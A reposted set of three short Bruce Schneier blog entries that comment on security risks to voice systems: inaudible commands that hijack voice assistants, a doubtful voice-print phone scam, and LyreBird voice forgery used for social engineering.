Hacking Voice Assistant Systems with Inaudible Voice Commands

Turns out that all the major voice assistants — Siri, Google Now, Samsung S Voice, Huawei HiVoice, Cortana and Alexa — listen at audio frequencies the human ear can’t hear. Hackers can hijack those systems with inaudible commands that their owners can’t hear. News articles….

Turns out that all the major voice assistants -- Siri, Google Now, Samsung S Voice, Huawei
HiVoice, Cortana and Alexa -- listen at audio frequencies the human ear can't hear. Hackers can hijack those systems with inaudible commands that their owners can't hear.

News articles.

from https://www.schneier.com/blog/

Stealing Voice Prints

This article feels like hyperbole: The scam has arrived in Australia after being used in the United States and Britain. The scammer may ask several times "can you hear me?", to which people would usually reply "yes." The scammer is then believed to record the "yes" response and end the call. That recording of the victim’s voice can then be…

This article feels like hyperbole:

The scam has arrived in Australia after being used in the United States and Britain.

The scammer may ask several times "can you hear me?", to which people would usually reply "yes."

The scammer is then believed to record the "yes" response and end the call.

That recording of the victim's voice can then be used to authorise payments or charges in the victim's name through voice recognition.

Are there really banking systems that use voice recognition of the word "yes" to authenticate? I have never heard of that.

from https://www.schneier.com/blog/

Forging Voice

LyreBird is a system that can accurately reproduce the voice of someone, given a large amount of sample inputs. It’s pretty good — listen to the demo here — and will only get better over time. The applications for recorded-voice forgeries are obvious, but I think the larger security risk will be real-time forgery. Imagine the social engineering implications of…

LyreBird is a system that can accurately reproduce the voice of someone, given a large amount of sample inputs. It's pretty good -- listen to the demo here -- and will only get better over time.

The applications for recorded-voice forgeries are obvious, but I think the larger security risk will be real-time forgery. Imagine the social engineering implications of an attacker on the telephone being able to impersonate someone the victim knows.

I don't think we're ready for this. We use people's voices to authenticate them all the time, in all sorts of different ways.

EDITED TO ADD (5/11): This is from 2003 on the topic.

from https://www.schneier.com/blog/